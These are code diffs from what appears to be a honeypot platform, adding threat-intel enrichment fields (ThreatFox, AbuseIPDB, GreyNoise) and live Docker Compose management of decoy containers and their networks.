if not body_lines:
return set()
reader = csv.reader(body_lines)
header = next(reader, None)
if not header:
return set()
norm = [h.strip().strip('"').lower() for h in header]
try:
col = norm.index("sha256_hash")
except ValueError:
# Fallback — first column is sha256 in every documented
# variant; if the header naming changes upstream we still
# capture something rather than silently emptying the set.
col = 0
out: set[str] = set()
for row in reader:
if len(row) <= col:
continue
cell = row[col].strip().strip('"').lower()
if len(cell) == 64 and all(c in "0123456789abcdef" for c in cell):
out.add(cell)
return out

View File

@@ -12,7 +12,6 @@ caps requests/min — the provider works either way.
""" """
from __future__ import annotations from __future__ import annotations
import json
import os import os
from datetime import datetime, timezone from datetime import datetime, timezone
from typing import Optional from typing import Optional
@@ -71,7 +70,10 @@ class ThreatFoxProvider(IntelProvider):
verdict=None, # absence is not a benign signal verdict=None, # absence is not a benign signal
column_updates={ column_updates={
"threatfox_listed": False, "threatfox_listed": False,
"threatfox_raw": "{}", "threatfox_threat_types": [],
"threatfox_ioc_types": [],
"threatfox_malware_families": [],
"threatfox_raw": {},
"threatfox_queried_at": datetime.now(timezone.utc), "threatfox_queried_at": datetime.now(timezone.utc),
}, },
) )
@@ -83,12 +85,37 @@ class ThreatFoxProvider(IntelProvider):
data = payload.get("data") or [] data = payload.get("data") or []
listed = bool(data) listed = bool(data)
# Each match in ``data`` carries threat_type / ioc_type / malware
# (canonical family). The IntelLifter dispatches ATT&CK techniques
# off ``threat_type`` (botnet_cc / payload_delivery / payload /
# cc_skimming); the other two columns are evidence and SIEM
# context. Sets are flattened across matches and serialised
# sorted for determinism.
threat_types: set[str] = set()
ioc_types: set[str] = set()
families: set[str] = set()
if isinstance(data, list):
for entry in data:
if not isinstance(entry, dict):
continue
tt = entry.get("threat_type")
if isinstance(tt, str) and tt:
threat_types.add(tt)
it = entry.get("ioc_type")
if isinstance(it, str) and it:
ioc_types.add(it)
family = entry.get("malware") or entry.get("malware_printable")
if isinstance(family, str) and family:
families.add(family)
return IntelResult( return IntelResult(
provider=self.name, provider=self.name,
verdict="malicious" if listed else None, verdict="malicious" if listed else None,
column_updates={ column_updates={
"threatfox_listed": listed, "threatfox_listed": listed,
"threatfox_raw": json.dumps(data), "threatfox_threat_types": sorted(threat_types),
"threatfox_ioc_types": sorted(ioc_types),
"threatfox_malware_families": sorted(families),
"threatfox_raw": data,
"threatfox_queried_at": datetime.now(timezone.utc), "threatfox_queried_at": datetime.now(timezone.utc),
}, },
) )

View File

@@ -59,6 +59,38 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
return None return None
def _build_intel_event_payload(
attacker_uuid: str,
ip: str,
row: dict[str, Any],
providers: list[IntelProvider],
) -> dict[str, Any]:
"""Project the AttackerIntel row into the bus event the TTP worker
consumes as ``source_kind="intel"``.
"""
return {
"attacker_uuid": attacker_uuid,
"attacker_ip": ip,
"aggregate_verdict": row.get("aggregate_verdict"),
"providers": [p.name for p in providers],
# AbuseIPDB
"abuseipdb_score": row.get("abuseipdb_score"),
"abuseipdb_categories": row.get("abuseipdb_categories") or [],
# GreyNoise
"greynoise_classification": row.get("greynoise_classification"),
"greynoise_name": row.get("greynoise_name"),
"greynoise_tags": row.get("greynoise_tags") or [],
# Feodo
"feodo_listed": row.get("feodo_listed"),
"feodo_malware_family": row.get("feodo_malware_family"),
# ThreatFox
"threatfox_listed": row.get("threatfox_listed"),
"threatfox_threat_types": row.get("threatfox_threat_types") or [],
"threatfox_ioc_types": row.get("threatfox_ioc_types") or [],
"threatfox_malware_families": row.get("threatfox_malware_families") or [],
}
async def _enrich_one( async def _enrich_one(
attacker_uuid: str, attacker_uuid: str,
ip: str, ip: str,
@@ -172,12 +204,9 @@ async def run_intel_loop(
await publish_safely( await publish_safely(
bus, bus,
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED), _topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
{ _build_intel_event_payload(
"attacker_uuid": attacker_uuid, attacker_uuid, ip, row, providers,
"attacker_ip": ip, ),
"aggregate_verdict": row.get("aggregate_verdict"),
"providers": [p.name for p in providers],
},
event_type=_topics.ATTACKER_INTEL_ENRICHED, event_type=_topics.ATTACKER_INTEL_ENRICHED,
) )
except Exception: # noqa: BLE001 except Exception: # noqa: BLE001
@@ -200,11 +229,11 @@ async def run_intel_loop(
t.cancel() t.cancel()
if heartbeat_task is not None: if heartbeat_task is not None:
heartbeat_task.cancel() heartbeat_task.cancel()
for t in (*wake_tasks, heartbeat_task): for task in (*wake_tasks, heartbeat_task):
if t is None: if task is None:
continue continue
with contextlib.suppress(asyncio.CancelledError, Exception): with contextlib.suppress(asyncio.CancelledError, Exception):
await t await task
if bus is not None: if bus is not None:
with contextlib.suppress(Exception): with contextlib.suppress(Exception):
await bus.close() await bus.close()

View File

@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
self.component = component self.component = component
def filter(self, record: logging.LogRecord) -> bool: def filter(self, record: logging.LogRecord) -> bool:
record.decnet_component = self.component # type: ignore[attr-defined] record.decnet_component = self.component
return True return True
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
span = trace.get_current_span() span = trace.get_current_span()
ctx = span.get_span_context() ctx = span.get_span_context()
if ctx and ctx.trace_id: if ctx and ctx.trace_id:
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined] record.otel_trace_id = format(ctx.trace_id, "032x")
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined] record.otel_span_id = format(ctx.span_id, "016x")
else: else:
record.otel_trace_id = "0" # type: ignore[attr-defined] record.otel_trace_id = "0"
record.otel_span_id = "0" # type: ignore[attr-defined] record.otel_span_id = "0"
except Exception: except Exception:
record.otel_trace_id = "0" # type: ignore[attr-defined] record.otel_trace_id = "0"
record.otel_span_id = "0" # type: ignore[attr-defined] record.otel_span_id = "0"
return True return True

View File

@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
services: list[str] = PydanticField(..., min_length=1) services: list[str] = PydanticField(..., min_length=1)
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22" distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
base_image: str # Docker image for the base/IP-holder container base_image: str # Docker image for the base/IP-holder container
build_base: str = "debian:bookworm-slim" # apt-compatible image for service Dockerfiles build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252" # apt-compatible image for service Dockerfiles; digest pinned via distros.py
hostname: str hostname: str
archetype: str | None = None # archetype slug if spawned from an archetype profile archetype: str | None = None # archetype slug if spawned from an archetype profile
service_config: dict[str, dict] = PydanticField(default_factory=dict) service_config: dict[str, dict] = PydanticField(default_factory=dict)

View File

@@ -101,7 +101,10 @@ async def mutate_decky(
try: try:
# Wrap blocking call in thread # Wrap blocking call in thread
await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path) cp = compose_path
await anyio.to_thread.run_sync(
lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
)
except Exception as e: except Exception as e:
log.error("mutation failed decky=%s error=%s", decky_name, e) log.error("mutation failed decky=%s error=%s", decky_name, e)
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]") console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
@@ -161,6 +164,8 @@ async def mutate_all(
if force or only is not None: if force or only is not None:
due = True due = True
else: else:
if interval_mins is None:
continue
elapsed_secs = now - decky.last_mutated elapsed_secs = now - decky.last_mutated
due = elapsed_secs >= (interval_mins * 60) due = elapsed_secs >= (interval_mins * 60)
remaining = (interval_mins * 60) - elapsed_secs remaining = (interval_mins * 60) - elapsed_secs
@@ -284,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
return 0 return 0
drained = 0 drained = 0
for topo in pending: for topo in pending:
tid = topo["id"] tid = topo.id
try: try:
await _deployer.resync_agent_topology(repo, tid) await _deployer.resync_agent_topology(repo, tid)
await repo.set_topology_resync(tid, False) await repo.set_topology_resync(tid, False)
drained += 1 drained += 1
log.info("topology %s resynced to agent %s", log.info("topology %s resynced to agent %s",
tid, topo.get("target_host_uuid")) tid, topo.target_host_uuid)
except Exception as exc: # noqa: BLE001 except Exception as exc: # noqa: BLE001
log.warning( log.warning(
"topology %s resync failed (will retry): %s", tid, exc, "topology %s resync failed (will retry): %s", tid, exc,
@@ -405,11 +410,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
t.cancel() t.cancel()
if heartbeat_task is not None: if heartbeat_task is not None:
heartbeat_task.cancel() heartbeat_task.cancel()
for t in (*wake_tasks, heartbeat_task): for task in (*wake_tasks, heartbeat_task):
if t is None: if task is None:
continue continue
with contextlib.suppress(asyncio.CancelledError, Exception): with contextlib.suppress(asyncio.CancelledError, Exception):
await t await task
if bus is not None: if bus is not None:
with contextlib.suppress(Exception): with contextlib.suppress(Exception):
await bus.close() await bus.close()

View File

@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
) )
async def _materialise_lan_change(
repo: Any,
topology_id: str,
*,
created: Optional[tuple[str, str, bool]] = None,
removed: Optional[str] = None,
) -> None:
"""Create or remove the docker bridge for a live LAN op + re-render compose.
Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
write lands. Skips when:
* the topology is not active/degraded (a pending topology gets its
networks created at deploy time),
* the topology is pinned to a swarm agent (cross-host materialisation
isn't implemented; the agent's apply_topology RPC re-renders the
whole compose at next push),
* the docker SDK / networking primitive raises (logged, not
re-raised — the DB row is the source of truth).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return
status = topology.status
if status not in ("active", "degraded"):
return
if topology.target_host_uuid:
_log.info(
"live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
topology_id,
)
return
# Lazy imports — these pull in docker.py / network.py which both
# require the docker SDK; keeping them out of module-import keeps
# the mutator usable in test environments that stub docker.
import docker
from decnet.engine.deployer import _topology_compose_path
from decnet.network import create_bridge_network, remove_bridge_network
from decnet.topology.compose import _network_name, write_topology_compose
client = docker.from_env()
try:
if created is not None:
name, subnet, is_dmz = created
net_name = _network_name(topology_id, name)
try:
create_bridge_network(
client, net_name, subnet, internal=not is_dmz,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
topology_id, name, subnet, exc,
)
# Don't re-raise — the DB row is the source of truth.
# Operator can retry by removing + re-adding the LAN.
if removed is not None:
net_name = _network_name(topology_id, removed)
try:
remove_bridge_network(client, net_name)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_lan: bridge remove failed topology=%s lan=%s: %s",
topology_id, removed, exc,
)
# Re-render compose so the file on disk matches the DB. Even
# when the bridge create above failed, a future redeploy will
# try to bring the network back from the compose definition.
hydrated = await hydrate(repo, topology_id)
if hydrated is not None:
try:
write_topology_compose(
hydrated, _topology_compose_path(topology_id),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live LAN op: compose re-render failed topology=%s: %s",
topology_id, exc,
)
except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure
_log.error(
"live LAN materialisation crashed topology=%s: %s",
topology_id, exc,
)
def _is_buildx_wedge(exc: BaseException) -> bool:
"""True when *exc* looks like the buildx EROFS wedge.
We consult both the structured CalledProcessError.stderr and the
str(exc) form because ``_compose_with_retry`` raises a synthetic
CalledProcessError whose ``stderr`` contains the recovery hint
(which preserves the wedge signatures verbatim).
"""
from decnet.engine.deployer import (
_BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
)
stderr = ""
if hasattr(exc, "stderr") and exc.stderr:
stderr = str(exc.stderr)
haystack = (stderr + " " + str(exc)).lower()
return (
_BUILDX_WEDGE_SIGNATURE in haystack
and _BUILDX_EROFS_SIGNATURE in haystack
)
async def _compose_up_with_buildkit_fallback(
*args: str, compose_file, label: str,
) -> None:
"""Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
The buildx activity dir occasionally lands on a read-only mount —
happens enough on operator dev boxes that we don't want a single
wedge to abort a live decky-add. When _compose_with_retry raises
with the EROFS-wedge signatures, we retry once with
``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't
use the activity dir and isn't affected.
*label* is a human-readable identifier used only in log lines so an
operator can grep the fall-back back to the originating op.
"""
import anyio
from decnet.engine.deployer import _compose_with_retry
try:
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(*args, compose_file=compose_file),
)
return
except Exception as exc: # noqa: BLE001
if not _is_buildx_wedge(exc):
raise
_log.warning(
"%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
"(legacy builder). Recover the buildx state at your leisure: "
"rm -rf ~/.docker/buildx/activity && "
"docker buildx create --name decnet-builder --use --bootstrap",
label,
)
# Outside the except so the second attempt's traceback isn't
# nested under the first failure if it also blows up.
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(
*args, compose_file=compose_file,
env={"DOCKER_BUILDKIT": "0"},
),
)
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
"""Compose service names for one decky: base + each per-decky service.
Skips ``fleet_singleton`` services — those run once fleet-wide and
don't have a per-decky compose entry. Mirrors the same filter
applied at compose-render time
(:mod:`decnet.topology.compose.generate_topology_compose`).
"""
from decnet.services.registry import get_service
targets = [decky_name]
for svc_name in services:
try:
svc = get_service(svc_name)
except KeyError:
# Unknown service — leave it; the compose render won't emit
# a fragment for it, so compose up will simply ignore the
# name with a clear "no such service" error. Surface that
# rather than silently dropping it.
targets.append(f"{decky_name}-{svc_name}")
continue
if svc.fleet_singleton:
continue
targets.append(f"{decky_name}-{svc_name}")
return targets
async def _live_topology_or_none(
repo: Any, topology_id: str,
) -> Optional[dict[str, Any]]:
"""Return the topology row only when it's eligible for live materialisation.
Returns None (so callers can skip with a single ``if`` check) when:
* the topology doesn't exist;
* status is not ``active`` or ``degraded`` (pending topologies get
everything materialised at deploy time);
* the topology is pinned to a swarm agent (cross-host live editing
is its own routing workstream).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return None
if topology.status not in ("active", "degraded"):
return None
if topology.target_host_uuid:
_log.info(
"live decky op skipped (agent-pinned topology=%s); "
"next agent push will reconcile",
topology_id,
)
return None
return topology
async def _rerender_compose(repo: Any, topology_id: str) -> None:
"""Re-render the per-topology compose file from the current DB.
Called after each materialisation step so the file on disk matches
the topology rows. Soft-fails: a render error is logged but
doesn't poison the DB-side mutation.
"""
from decnet.engine.deployer import _topology_compose_path
from decnet.topology.compose import write_topology_compose
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return
try:
write_topology_compose(hydrated, _topology_compose_path(topology_id))
except Exception as exc: # noqa: BLE001
_log.warning(
"live op: compose re-render failed topology=%s: %s",
topology_id, exc,
)
async def _materialise_decky_spawn(
repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
"""compose up -d --no-deps --build for one decky (base + services).
Re-renders compose first so the file lists the new decky. Returns
True when compose-up reported success, False otherwise (or when
the topology isn't eligible for live materialisation — pending
topologies skip and return False so the caller doesn't flip the
state to ``running`` based on a no-op). Best-effort: docker
failure is logged, not re-raised — DB row is the source of truth.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return False
from decnet.engine.deployer import _topology_compose_path
await _rerender_compose(repo, topology_id)
targets = _decky_targets(decky_name, services)
compose_path = _topology_compose_path(topology_id)
try:
await _compose_up_with_buildkit_fallback(
"up", "-d", "--no-deps", "--build", *targets,
compose_file=compose_path,
label=f"live add_decky topology={topology_id} decky={decky_name}",
)
return True
except Exception as exc: # noqa: BLE001
_log.error(
"live add_decky: compose up failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
return False
async def _materialise_decky_remove(
repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
"""compose stop + rm -f for one decky's containers, then re-render."""
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import _compose, _topology_compose_path
targets = _decky_targets(decky_name, services)
compose_path = _topology_compose_path(topology_id)
# Stop + rm BEFORE re-rendering compose; the re-rendered file no
# longer mentions the decky, so a stop run AFTER rendering would
# find no service to act on.
try:
await anyio.to_thread.run_sync(
lambda: _compose("stop", *targets, compose_file=compose_path),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_decky: compose stop failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
try:
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_decky: compose rm failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_connect(
repo: Any, topology_id: str,
decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
"""SDK ``network.connect`` to multi-home a running base container.
Service containers share the base's netns via ``network_mode:
service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
the base alone gives every service container the new interface for
free — we don't need to iterate.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return
import docker
from decnet.topology.compose import _container_name, _network_name
net_name = _network_name(topology_id, lan_name)
container_name = _container_name(topology_id, decky_name)
try:
client = docker.from_env()
net = client.networks.get(net_name)
container = client.containers.get(container_name)
net.connect(container, ipv4_address=ipv4_address)
except docker.errors.APIError as exc:
# Idempotency — already on the network is fine.
msg = str(exc).lower()
if "already" in msg or "endpoint" in msg and "exists" in msg:
_log.info(
"live attach_decky: %s already on network %s — skipping",
container_name, net_name,
)
else:
_log.error(
"live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_disconnect(
repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
"""SDK ``network.disconnect`` to drop a multi-home edge."""
if await _live_topology_or_none(repo, topology_id) is None:
return
import docker
from decnet.topology.compose import _container_name, _network_name
net_name = _network_name(topology_id, lan_name)
container_name = _container_name(topology_id, decky_name)
try:
client = docker.from_env()
net = client.networks.get(net_name)
container = client.containers.get(container_name)
net.disconnect(container)
except docker.errors.APIError as exc:
msg = str(exc).lower()
if "not connected" in msg or "no such" in msg:
_log.info(
"live detach_decky: %s already off network %s — skipping",
container_name, net_name,
)
else:
_log.error(
"live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_services_diff(
repo: Any, topology_id: str,
decky_name: str,
added: list[str],
removed: list[str],
) -> None:
"""Add/remove per-service containers without touching siblings.
Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
without coupling the mutator to that module — service mutations
routed via the mutator queue publish ``mutation.applied`` while the
direct API publishes ``decky.<name>.service_added``; they share
machinery, not control flow.
"""
if not added and not removed:
return
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import _compose, _topology_compose_path
await _rerender_compose(repo, topology_id)
compose_path = _topology_compose_path(topology_id)
add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base
if add_targets:
try:
await _compose_up_with_buildkit_fallback(
"up", "-d", "--no-deps", "--build", *add_targets,
compose_file=compose_path,
label=f"live update_decky add topology={topology_id} decky={decky_name}",
)
except Exception as exc: # noqa: BLE001
_log.error(
"live update_decky add: compose up failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
rm_targets = _decky_targets(decky_name, list(removed))[1:]
for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
if not rm_targets:
break
try:
await anyio.to_thread.run_sync(
lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc]
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live update_decky %s failed topology=%s decky=%s: %s",
action_name, topology_id, decky_name, exc,
)
async def _materialise_decky_recreate_base(
repo: Any, topology_id: str, decky_name: str,
) -> None:
"""Force-recreate just the base container (used for forwards_l3 flips).
DESTRUCTIVE: kills any in-container state on the base. Service
containers re-attach via ``network_mode: service:<base>`` after the
base is rebuilt. Caller is responsible for gating this on an
explicit operator-supplied ``force=true`` flag.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import (
_compose_with_retry, _topology_compose_path,
)
await _rerender_compose(repo, topology_id)
compose_path = _topology_compose_path(topology_id)
try:
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(
"up", "-d", "--no-deps", "--force-recreate", decky_name,
compose_file=compose_path,
),
)
except Exception as exc: # noqa: BLE001
_log.error(
"live update_decky recreate_base failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
# ------------------------------------------------------------------- ops # ------------------------------------------------------------------- ops
@@ -131,6 +588,16 @@ async def apply_add_lan(
"y": payload.get("y"), "y": payload.get("y"),
} }
) )
# Live materialisation: when the topology is active/degraded, create
# the docker bridge network now and re-render the per-topology
# compose file so subsequent ``apply_add_decky`` writes a coherent
# services map. Pending topologies skip this — the next deploy
# creates everything from scratch. Agent-pinned topologies also
# skip; live editing on agents is its own routing problem.
await _materialise_lan_change(
repo, topology_id, created=(name, subnet, is_dmz),
)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
@@ -150,7 +617,17 @@ async def apply_remove_lan(
f"LAN {lan['name']!r} is the home LAN of decky " f"LAN {lan['name']!r} is the home LAN of decky "
f"{d['decky_config']['name']!r}; remove the decky first" f"{d['decky_config']['name']!r}; remove the decky first"
) )
await repo.delete_lan(lan["id"]) lan_name = lan["name"]
# enforce_pending=False: the mutator queue is the live-editing
# surface, gated on topology status by us before we got here. The
# repo's pending-only guard is for HTTP CRUD callers that mustn't
# bypass it.
await repo.delete_lan(lan["id"], enforce_pending=False)
# Live materialisation symmetric to apply_add_lan: tear down the
# docker bridge and re-render compose so a future redeploy doesn't
# try to wire deckies into a network that no longer exists.
await _materialise_lan_change(repo, topology_id, removed=lan_name)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
@@ -204,11 +681,12 @@ async def apply_add_decky(
if forwards_l3: if forwards_l3:
decky_config["forwards_l3"] = True decky_config["forwards_l3"] = True
services_list = list(payload.get("services", []))
decky_uuid = await repo.add_topology_decky( decky_uuid = await repo.add_topology_decky(
{ {
"topology_id": topology_id, "topology_id": topology_id,
"name": name, "name": name,
"services": list(payload.get("services", [])), "services": services_list,
"decky_config": decky_config, "decky_config": decky_config,
"x": payload.get("x"), "x": payload.get("x"),
"y": payload.get("y"), "y": payload.get("y"),
@@ -223,6 +701,25 @@ async def apply_add_decky(
"forwards_l3": forwards_l3, "forwards_l3": forwards_l3,
} }
) )
# Live materialisation: spawn the new decky's containers without
# touching siblings. Skips on pending / agent-pinned topologies —
# see _live_topology_or_none.
spawned = await _materialise_decky_spawn(
repo, topology_id, name, services_list,
)
# Flip the row's state to 'running' on success so the dashboard's
# ACTIVE DECKIES count reflects reality. Without this the row
# stays at the default 'pending' forever; the deployer's full
# post-deploy reconcile only runs on a fresh deploy_topology.
if spawned:
try:
await repo.update_topology_decky(decky_uuid, {"state": "running"})
except Exception as exc: # noqa: BLE001
_log.warning(
"live add_decky: state flip to running failed "
"topology=%s decky=%s: %s",
topology_id, name, exc,
)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
@@ -286,6 +783,16 @@ async def apply_attach_decky(
"forwards_l3": forwards_l3, "forwards_l3": forwards_l3,
} }
) )
# Live materialisation: SDK network.connect on the base container.
# Service containers share the base's netns via network_mode:
# service:<base>, so they inherit the new interface — only the base
# needs the connect.
await _materialise_decky_connect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
ipv4_address=ip,
)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
@@ -329,7 +836,15 @@ async def apply_detach_decky(
await repo.update_topology_decky( await repo.update_topology_decky(
decky["uuid"], {"decky_config": new_cfg} decky["uuid"], {"decky_config": new_cfg}
) )
await repo.delete_topology_edge(edge["id"]) await repo.delete_topology_edge(edge["id"], enforce_pending=False)
# Live materialisation: SDK network.disconnect on the base
# container. Service containers automatically lose visibility into
# the LAN because they share the base's netns.
await _materialise_decky_disconnect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
@@ -340,7 +855,15 @@ async def apply_remove_decky(
decky = _decky_by_name(hydrated, payload["decky"]) decky = _decky_by_name(hydrated, payload["decky"])
if decky is None: if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found") raise MutationError(f"decky {payload['decky']!r} not found")
await repo.delete_topology_decky(decky["uuid"]) decky_name = decky["decky_config"]["name"]
services_list = list(decky.get("services") or [])
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
# Live materialisation: stop + rm -f the decky's containers. We
# capture decky_name + services BEFORE the delete so the helper
# has the targets even though the row is gone.
await _materialise_decky_remove(
repo, topology_id, decky_name, services_list,
)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
@@ -354,31 +877,136 @@ async def apply_update_decky(
``patch`` — dict merged into existing ``decky_config``. ``patch`` — dict merged into existing ``decky_config``.
``services`` — replacement top-level services list. ``services`` — replacement top-level services list.
``x``,``y`` — layout coords. ``x``,``y`` — layout coords.
``force`` — opt-in for destructive recreates (currently
required when ``forwards_l3`` flips on a
live topology — see below).
Live materialisation strategy:
* **services changed** → diff old vs new; ``compose up -d`` for
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
direct API path (services_live) without coupling.
* **forwards_l3 flipped** → port publishing changes, which docker
can only apply at container-create time. Requires recreating
the base — destructive (kills in-container state, drops active
sessions). Gated on ``payload['force'] is True``; otherwise we
raise ``MutationError`` so a half-thinking operator doesn't
stomp a live decky.
* **only coords (x/y)** → DB-only. No docker work.
""" """
hydrated = await _hydrated(repo, topology_id) hydrated = await _hydrated(repo, topology_id)
decky = _decky_by_name(hydrated, payload["decky"]) decky = _decky_by_name(hydrated, payload["decky"])
if decky is None: if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found") raise MutationError(f"decky {payload['decky']!r} not found")
# Capture pre-state so we can compute the diff after the DB write.
old_services = list(decky.get("services") or [])
old_cfg = decky.get("decky_config") or {}
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
patch: dict[str, Any] = {} patch: dict[str, Any] = {}
new_decky_config = old_cfg
if payload.get("patch"): if payload.get("patch"):
merged = dict(decky["decky_config"]) new_decky_config = {**old_cfg, **payload["patch"]}
merged.update(payload["patch"]) patch["decky_config"] = new_decky_config
patch["decky_config"] = merged new_services = old_services
if "services" in payload: if "services" in payload:
patch["services"] = list(payload["services"]) new_services = list(payload["services"])
patch["services"] = new_services
for key in ("x", "y"): for key in ("x", "y"):
if key in payload: if key in payload:
patch[key] = payload[key] patch[key] = payload[key]
if not patch: if not patch:
return return
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
# 'gateway' semantic specifically means 'host-port publisher facing
# the DMZ' — running it on an internal LAN publishes ports the
# outside world can't reach and shadows the host's port space.
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
# the generator/attach paths, not by this op, so this check only
# fires when the operator explicitly toggles the flag.
if forwards_l3_flipped and new_forwards_l3:
# Re-derive the home LAN from the edges; same logic as
# check_gateway_homed_in_dmz.
decky_uuid = decky["uuid"]
home_lan_id: Optional[str] = None
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
home_lan_id = e["lan_id"]
break
if home_lan_id is None:
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid:
home_lan_id = e["lan_id"]
break
home_lan = next(
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
None,
)
if home_lan is None or not home_lan.get("is_dmz"):
home_name = home_lan["name"] if home_lan else "(unknown)"
raise MutationError(
f"cannot promote decky {decky['decky_config']['name']!r} "
f"to gateway: home LAN {home_name!r} is not a DMZ. "
"Move the decky to the DMZ first, or pick a different decky."
)
# Pre-check the destructive flip BEFORE any DB write, so a refused
# mutation leaves zero side-effects.
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
raise MutationError(
f"forwards_l3 flip on live decky "
f"{decky['decky_config']['name']!r} requires force=true; "
"this will recreate the base container and drop in-container state"
)
await repo.update_topology_decky(decky["uuid"], patch) await repo.update_topology_decky(decky["uuid"], patch)
# Materialisation — only when the topology is actually live.
# _live_topology_or_none was already called above; calling the
# individual helpers re-checks (cheap) so they stay self-contained.
decky_name = decky["decky_config"]["name"]
added = sorted(set(new_services) - set(old_services))
removed = sorted(set(old_services) - set(new_services))
if added or removed:
await _materialise_decky_services_diff(
repo, topology_id, decky_name, added, removed,
)
if forwards_l3_flipped:
# force was checked above; reaching here means the operator
# opted in. recreate_base re-renders compose first so the
# rebuilt base picks up the new `ports:` block.
await _materialise_decky_recreate_base(
repo, topology_id, decky_name,
)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
async def apply_update_lan( async def apply_update_lan(
repo: Any, topology_id: str, payload: dict[str, Any] repo: Any, topology_id: str, payload: dict[str, Any]
) -> None: ) -> None:
